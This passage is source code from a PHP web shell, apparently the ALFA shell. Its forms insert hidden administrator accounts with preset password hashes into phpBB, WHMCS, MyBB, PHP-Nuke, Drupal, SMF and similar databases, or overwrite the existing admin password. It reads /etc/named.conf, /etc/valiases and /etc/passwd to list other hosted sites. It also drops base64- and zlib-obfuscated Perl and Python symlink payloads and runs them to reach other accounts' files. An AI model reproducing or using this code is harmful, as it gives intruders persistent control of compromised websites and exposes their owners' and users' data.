4018$adm_perm = "16744444";
4019if($pw_col > 0){
4020$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
4021}else{
4022$adm_perm = "2143256444";
4023$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,'6','$admin','\$2y\$10\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq','Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>','$SQL','".date('Y-m-d')."','".time()."','blowfish:10','1984-05-20')") or die(mysqli_error($conn));
4024}
4025$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
4026$sole = mysqli_num_rows($solevisible);
4027if($sole == 1){
4028$solevis = mysqli_fetch_assoc($solevisible);
4029$res = $solevis['userid'];
4030}
4031$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','".$adm_perm."')") or die(mysqli_error($conn));
4032if($solevisible){
4033__alert('Success... '.$admin.' is created...');}
4034}
4035}
4036if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
4037
4038echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4039$table = array('td1' =>
4040 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4041 'td2' =>
4042 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4043 'td3' =>
4044 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4045 'td4' =>
4046 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4047 'td5' =>
4048 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4049 'td6' =>
4050 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4051 'td7' =>
4052 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4053 'td8' =>
4054 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4055);
4056create_table($table);
4057echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4058if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4059$localhost = $_POST['alfa2'];
4060$database = $_POST['alfa3'];
4061$username = $_POST['alfa4'];
4062$password = $_POST['alfa6'];
4063$admin = $_POST['alfa8'];
4064$SQL = $_POST['alfa9'];
4065$prefix = $_POST['alfa10'];
4066$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4067$hash = md5('solevisible');
4068$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4069$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4070$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
4071$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
4072$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4073if($solevisible){
4074__alert('Success... '.$admin.' is created...');
4075}
4076}
4077}
4078if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
4079
4080echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
4081$table = array('td1' =>
4082 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4083 'td2' =>
4084 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4085 'td3' =>
4086 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4087 'td4' =>
4088 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4089 'td6' =>
4090 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4091 'td7' =>
4092 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4093 'td8' =>
4094 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4095);
4096create_table($table);
4097echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4098if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4099$localhost = $_POST['alfa2'];
4100$database = $_POST['alfa3'];
4101$username = $_POST['alfa4'];
4102$password = $_POST['alfa5'];
4103$admin = $_POST['alfa8'];
4104$SQL = $_POST['alfa9'];
4105$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4106$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
4107if($solevisible){
4108__alert('Success... '.$admin.' is created...');}
4109}
4110}
4111if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
4112
4113echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4114$table = array('td1' =>
4115 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4116 'td2' =>
4117 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4118 'td3' =>
4119 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4120 'td4' =>
4121 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4122 'td5' =>
4123 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4124 'td6' =>
4125 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4126 'td7' =>
4127 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4128 'td8' =>
4129 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4130);
4131create_table($table);
4132echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4133if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4134$localhost = $_POST['alfa2'];
4135$database = $_POST['alfa3'];
4136$username = $_POST['alfa4'];
4137$password = $_POST['alfa5'];
4138$admin = $_POST['alfa8'];
4139$SQL = $_POST['alfa9'];
4140$prefix = $_POST['alfa10'];
4141$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4142$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
4143if($solevisible){
4144__alert('Success... '.$admin.' is created...');}
4145}
4146}
4147if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
4148
4149echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
4150$table = array('td1' =>
4151 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4152 'td2' =>
4153 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4154 'td3' =>
4155 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4156 'td4' =>
4157 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4158 'td5' =>
4159 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4160 'td6' =>
4161 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4162 'td7' =>
4163 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4164 'td8' =>
4165 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4166);
4167create_table($table);
4168echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4169if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4170$localhost = $_POST['alfa2'];
4171$database = $_POST['alfa3'];
4172$username = $_POST['alfa4'];
4173$password = $_POST['alfa5'];
4174$admin = $_POST['alfa7'];
4175$SQL = $_POST['alfa9'];
4176$prefix = $_POST['alfa10'];
4177$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4178$hash = md5($pwd);
4179$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4180if($solevisible){
4181__alert('Success... '.$admin.' is created...');}
4182}
4183}
4184if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
4185
4186echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
4187$table = array('td1' =>
4188 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4189 'td2' =>
4190 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4191 'td3' =>
4192 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4193 'td4' =>
4194 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4195 'td6' =>
4196 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4197 'td7' =>
4198 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
4199 );
4200create_table($table);
4201echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4202if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4203$localhost = $_POST['alfa2'];
4204$database = $_POST['alfa4'];
4205$username = $_POST['alfa5'];
4206$password = $_POST['alfa6'];
4207$admin = $_POST['alfa8'];
4208$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4209$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
4210$getDescuid = @mysqli_fetch_assoc($getDescuid);
4211$getDescuid = $getDescuid['uid'];
4212$getdescuid = $getDescuid++;
4213$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
4214$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
4215$sole = mysqli_num_rows($solevisible);
4216if ($sole == 1){
4217$solevis = mysqli_fetch_assoc($solevisible);
4218$res = $solevis['uid'];
4219}
4220$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
4221if($solevisible){
4222__alert('Success... '.$admin.' is created...');}
4223}
4224}
4225
4226if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
4227
4228echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
4229$table = array('td1' =>
4230 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4231 'td2' =>
4232 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4233 'td3' =>
4234 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4235 'td4' =>
4236 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4237 'td5' =>
4238 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
4239 'td6' =>
4240 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4241 'td7' =>
4242 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4243 );
4244create_table($table);
4245echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4246if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4247$localhost = $_POST['alfa2'];
4248$database = $_POST['alfa3'];
4249$username = $_POST['alfa5'];
4250$password = $_POST['alfa6'];
4251$prefix = $_POST['alfa7'];
4252$admin = $_POST['alfa8'];
4253$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4254$setpwAlg = sha1(strtolower($admin) . 'solevisible');
4255$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
4256if($solevisible){
4257__alert('Success... '.$admin.' is created...');}
4258}
4259}
4260echo "</div>";
4261alfafooter();
4262}
4263function alfaMakePwd(){
4264 if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
4265 return "/home/{user}/public_html/";
4266 }
4267 $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
4268 $public = end($document);
4269 array_pop($document);
4270 array_pop($document);
4271 $path = implode("/", $document) . "/{user}/" . $public;
4272 return $path;
4273}
4274function alfaGetDomains($state = false){
4275 $state = "named.conf";
4276 $lines = array();
4277 $lines = _alfa_file('/etc/named.conf');
4278 if(!$lines){
4279 $lines = @scandir("/etc/valiases/");
4280 $state = "valiases";
4281 if(!$lines){
4282 $lines = @scandir("/var/named");
4283 $state = "named";
4284 if(!$lines && $state){
4285 $lines = _alfa_file('/etc/passwd');
4286 $state = "passwd";
4287 }
4288 }
4289 }
4290 return array("lines" => $lines, "state" => $state);
4291}
4292function alfaCreateParentFolder(){
4293 $parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;
4294 if(!@is_dir($parent)){
4295 @mkdir($parent, 0755, true);
4296 }
4297}
4298function alfasymlink(){
4299alfahead();
4300AlfaNum(9,10);
4301alfaCreateParentFolder();
4302@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
4303echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
4304if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
4305 $sympath = alfaMakePwd();
4306 @mkdir('cgialfa',0755);
4307 @chdir('cgialfa');
4308 alfacgihtaccess('cgi');
4309 $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;my $alfa_data="'.__ALFA_DATA_FOLDER__.'";eval(Compress::Zlib::memGunzip(decode_base64("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")));';
4310 $py = '#!/usr/bin/python'."\nimport zlib, base64\nalfa_data='".__ALFA_DATA_FOLDER__."'\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
4311 $cginame = "symperl.alfa";
4312 $source = $perl;
4313 $lang = "perl";
4314 if($_POST["alfa2"]=="sympy"){
4315 $cginame = "pysymlink.alfa";
4316 $source = $py;
4317 $lang = "python";
4318 }
4319 @__write_file($cginame,$source);
4320 @chmod($cginame,0755);
4321 echo __pre();
4322 $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
4323 if(strlen($resource) == 0){
4324 echo AlfaiFrameCreator('cgialfa/'.$cginame);
4325 }else{
4326 echo $resource;
4327 }
4328}
